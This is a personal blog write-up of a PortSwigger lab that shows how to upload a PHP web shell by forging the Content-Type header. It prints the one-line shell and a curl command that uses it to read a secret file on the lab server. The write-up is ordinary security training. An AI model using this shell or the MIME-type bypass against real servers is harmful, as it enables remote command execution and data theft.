siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

Web shell upload via Content-Type restriction bypass | Dec 16, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Web shell upload via Content-Type restriction bypass! Without further ado, let’s dive in.

Background

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Exploitation

Home page:

Login as user wiener:

In the previous lab, we found the image upload function is vulnerable.

Let’s upload a normal image file and intercept the request via Burp Suite:

As you can see, we’re sending a POST request to /my-account/avatar, and the Content-Type is image/jpeg.

Let’s forward that request:

It said that the file has been uploaded.

Next, we can try to upload a PHP web shell one liner, and intercept the request:

<?php system($_GET['cmd']); ?>

Now, the Content-Type is changed to application/x-php.

But notice what will happened when we forward that request:

That being said, looks like we couldn’t upload a web shell?

However, the Content-Type can be fully-controlled by the attacker.

We can just simply change the Content-Type from application/x-php to image/jpeg or image/png!

Let’s do that:

Boom! We’ve successfully uploaded the web shell!

In the previous lab, we found that the uploaded file lives in /files/avatar/<filename>. Let’s trigger the web shell and cat the secret!

┌──(root🌸siunam)-[~/ctf/Portswigger-Labs/File-Upload-Vulnerabilities/FUV-2]
└─# curl https://0aae00cf048ad257c40c7f24001d009d.web-security-academy.net/files/avatars/webshell.php --get --data-urlencode "cmd=cat /home/carlos/secret"
cn37DQhyNzu7Z80CzayF9giYekMXdTDC

What we’ve learned:

  1. Web shell upload via Content-Type restriction bypass